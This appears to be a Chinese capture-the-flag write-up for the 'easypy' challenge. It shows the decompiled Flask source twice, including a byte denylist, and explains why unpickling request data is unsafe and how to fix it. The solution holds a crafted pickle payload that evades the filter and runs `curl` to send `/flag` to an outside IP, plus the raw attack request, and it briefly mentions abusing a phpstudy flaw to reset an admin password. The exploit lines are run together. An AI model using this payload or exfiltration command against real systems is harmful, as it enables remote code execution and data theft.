CTF—easypy

# Dependencies of the decompiled module, one import per line.
import base64

import numpy
from flask import Flask
from flask import Response
from flask import request

# Module-level Flask application object that the @app.route decorators register on.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: answer GET and POST with the same fixed greeting."""
    greeting = '小p想要找一个女朋友,你能帮他找找看么?'
    return greeting

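@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
    """Base64-decode the ``data`` request value and pass it to ``numpy.loads``.

    ``data`` is taken from ``request.values`` (query string or form body).
    The reply is always one of three fixed strings; the deserialized object is
    never used, so the call matters only for its side effects.

    SECURITY: ``numpy.loads`` is a deprecated alias for ``pickle.loads``, so
    this route unpickles bytes chosen by the client, and unpickling can run
    arbitrary code in the server process. The substring denylist below is not
    a mitigation: scanning for a few byte patterns cannot make a pickle stream
    safe. The fix is to stop unpickling request data (accept a plain data
    format such as JSON, or ``numpy.load(..., allow_pickle=False)`` for
    arrays), not to extend the denylist.
    """
    encoded = request.values.get('data')
    if not encoded:
        return '有进步了,但是不多'

    # NOTE(review): malformed base64 raises binascii.Error here and is not
    # caught in this function.
    numpydata = base64.b64decode(encoded)

    # Denylist kept exactly as decompiled. b'sh' already covers b'bash', and
    # b'R' matches any payload containing that byte, including harmless data.
    if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
        return '不能走捷径啊'

    # FIXME(security): deserialization of untrusted input (pickle via numpy).
    # The unused ``resp`` binding from the decompiled source is dropped.
    numpy.loads(numpydata)
    return '可以的,要的就是一种感觉'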

@app.route('/download', methods=['GET', 'POST'])
def download():
    """Send ``www.zip`` to the client as a file attachment.

    The path is relative, so it is resolved against the process working
    directory, and the whole archive is read into memory before the response
    is built. No check on the caller is made in this function.
    """
    with open('www.zip', 'rb') as archive:
        payload = archive.read()

    reply = Response(payload, content_type='application/octet-stream')
    # Ask the browser to save the body under the archive's own name.
    reply.headers['Content-disposition'] = 'attachment;filename=www.zip'
    return reply

if __name__ == '__main__':
    # Start Flask's built-in server on every interface, port 80.
    listen = {'host': '0.0.0.0', 'port': 80}
    app.run(**listen)
# okay decompiling .app.cpython-38.pyc

phpstudy漏洞修改admin密码

勾选系统权限,查看文件并下载flag

2

easypy

扫目录,有download路由,下载源码

# Dependencies of the decompiled module, one import per line.
import base64

import numpy
from flask import Flask
from flask import Response
from flask import request

# Module-level Flask application object that the @app.route decorators register on.
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Landing page: answer GET and POST with the same fixed greeting."""
    greeting = '小p想要找一个女朋友,你能帮他找找看么?'
    return greeting

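@app.route('/girlfriends', methods=['GET', 'POST'])
def girlfriends():
    """Base64-decode the ``data`` request value and pass it to ``numpy.loads``.

    ``data`` is taken from ``request.values`` (query string or form body).
    The reply is always one of three fixed strings; the deserialized object is
    never used, so the call matters only for its side effects.

    SECURITY: ``numpy.loads`` is a deprecated alias for ``pickle.loads``, so
    this route unpickles bytes chosen by the client, and unpickling can run
    arbitrary code in the server process. The substring denylist below is not
    a mitigation: scanning for a few byte patterns cannot make a pickle stream
    safe. The fix is to stop unpickling request data (accept a plain data
    format such as JSON, or ``numpy.load(..., allow_pickle=False)`` for
    arrays), not to extend the denylist.
    """
    encoded = request.values.get('data')
    if not encoded:
        return '有进步了,但是不多'

    # NOTE(review): malformed base64 raises binascii.Error here and is not
    # caught in this function.
    numpydata = base64.b64decode(encoded)

    # Denylist kept exactly as decompiled. b'sh' already covers b'bash', and
    # b'R' matches any payload containing that byte, including harmless data.
    if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:
        return '不能走捷径啊'

    # FIXME(security): deserialization of untrusted input (pickle via numpy).
    # The unused ``resp`` binding from the decompiled source is dropped.
    numpy.loads(numpydata)
    return '可以的,要的就是一种感觉'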

@app.route('/download', methods=['GET', 'POST'])
def download():
    """Send ``www.zip`` to the client as a file attachment.

    The path is relative, so it is resolved against the process working
    directory, and the whole archive is read into memory before the response
    is built. No check on the caller is made in this function.
    """
    with open('www.zip', 'rb') as archive:
        payload = archive.read()

    reply = Response(payload, content_type='application/octet-stream')
    # Ask the browser to save the body under the archive's own name.
    reply.headers['Content-disposition'] = 'attachment;filename=www.zip'
    return reply

if __name__ == '__main__':
    # Start Flask's built-in server on every interface, port 80.
    listen = {'host': '0.0.0.0', 'port': 80}
    app.run(**listen)
# okay decompiling .app.cpython-38.pyc

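过滤了字节 `R` 以及 `bash`/`sh`(反弹 shell 用不了),所以直接把结果外带。根本原因是 `numpy.loads` 等同于 `pickle.loads`:对不可信数据做反序列化本身就可能执行任意代码,字节黑名单修不好这个问题;防御上应改用 JSON 等纯数据格式,数组则用 `numpy.load(..., allow_pickle=False)`。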

import numpy
import pickleimport base64import osopcode=b'''c__builtin__mapp0 0(S'curl xxx:5555/`cat /flag`'tp10(cossystemg1tp20g0g2x81p30c__builtin__tuplep4(g3tx81.'''
code=base64.b64encode(opcode)print(code)# pickle.loads(base64.b64decode(code))numpydata = base64.b64decode(code)if b'R' in numpydata or b'bash' in numpydata or b'sh' in numpydata:    print('不能走捷径啊')else:    resp = numpy.loads(numpydata)    print("ok")POST /girlfriends HTTP/1.1Host: eci-2ze5mdaorvazf0lpit4y.cloudeci1.ichunqiu.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0OUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1X-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencodedContent-Length: 177
data=Y19fYnVpbHRpbl9fCm1hcApwMAowKFMnY3VybCAxMjQuNzAuMjA2LjIzODo1NTU1L2BjYXQgL2ZsYWdgJwp0cDEKMChjb3MKc3lzdGVtCmcxCnRwMgowZzAKZzIKgXAzCjBjX19idWlsdGluX18KdHVwbGUKcDQKKGczCnSBLg==